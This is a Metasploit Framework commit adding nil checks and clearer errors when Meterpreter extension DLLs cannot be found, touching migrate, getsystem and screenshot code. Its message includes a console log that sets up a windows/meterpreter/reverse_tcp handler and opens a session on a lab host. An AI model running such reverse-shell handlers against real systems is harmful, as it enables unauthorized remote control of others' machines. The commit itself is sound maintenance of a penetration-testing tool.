handle nil results from MeterpreterBinaries.path

Brent Cook · Brent Cook · commit 5d70b837edb9 · 2014-12-29T12:34:02.000-06:00
When a meterpreter binary cannot be found, give the user some hint about what
went wrong.

```
msf &gt; use exploit/multi/handler
msf exploit(handler) &gt; set payload windows/meterpreter/reverse_tcp
payload =&gt; windows/meterpreter/reverse_tcp
msf exploit(handler) &gt; set lhost 192.168.43.1
lhost =&gt; 192.168.43.1
msf exploit(handler) &gt; exploit

[*] Started reverse handler on 192.168.43.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.43.252
[*] Meterpreter session 1 opened (192.168.43.1:4444 -&gt; 192.168.43.252:49297) at 2014-12-29 12:32:37 -0600

meterpreter &gt; use mack
Loading extension mack...
[-] Failed to load extension: No module of the name ext_server_mack.x86.dll found
```

This is also useful for not scaring away would-be developers who replaced only
half (the wrong half) of their DLLs from a fresh meterpreter build and
everything exploded. Not that thats ever happened to me :)
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
@@ -159,6 +159,10 @@ def use(mod, opts = { })
       path = opts['ExtensionPath']
     end
 
+    if path == nil
+      raise RuntimeError, "No module of the name #{modname}.#{client.binary_suffix} found", caller
+    end
+
     path = ::File.expand_path(path)
 
     # Load the extension DLL
@@ -225,7 +229,12 @@ def migrate( pid )
 
     # Create the migrate stager
     migrate_stager = c.new()
-    migrate_stager.datastore['DLL'] = MeterpreterBinaries.path('metsrv',binary_suffix)
+
+    dll = MeterpreterBinaries.path('metsrv',binary_suffix)
+    if dll == nil
+      raise RuntimeError, "metsrv.#{binary_suffix} not found", caller
+    end
+    migrate_stager.datastore['DLL'] = dll
 
     blob = migrate_stager.stage_payload
 
diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -46,6 +46,9 @@ def getsystem( technique=0 )
     elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
 
     elevator_path = MeterpreterBinaries.path('elevator', client.binary_suffix)
+    if elevator_path == nil
+      raise RuntimeError, "elevator.#{binary_suffix} not found", caller
+    end
 
     elevator_path = ::File.expand_path( elevator_path )
 
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
@@ -157,6 +157,9 @@ def screenshot( quality=50 )
     # include the x64 screenshot dll if the host OS is x64
     if( client.sys.config.sysinfo['Architecture'] =~ /^\S*x64\S*/ )
       screenshot_path = MeterpreterBinaries.path('screenshot','x64.dll')
+      if screenshot_path == nil
+        raise RuntimeError, "screenshot.x64.dll not found", caller
+      end
       screenshot_path = ::File.expand_path( screenshot_path )
       screenshot_dll  = ''
       ::File.open( screenshot_path, 'rb' ) do |f|
@@ -165,8 +168,11 @@ def screenshot( quality=50 )
       request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER, screenshot_dll, false, true )
       request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH, screenshot_dll.length )
     end
-    # but allways include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
+    # but always include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
     screenshot_path = MeterpreterBinaries.path('screenshot','x86.dll')
+    if screenshot_path == nil
+      raise RuntimeError, "screenshot.x86.dll not found", caller
+    end
     screenshot_path = ::File.expand_path( screenshot_path )
     screenshot_dll  = ''
     ::File.open( screenshot_path, 'rb' ) do |f|
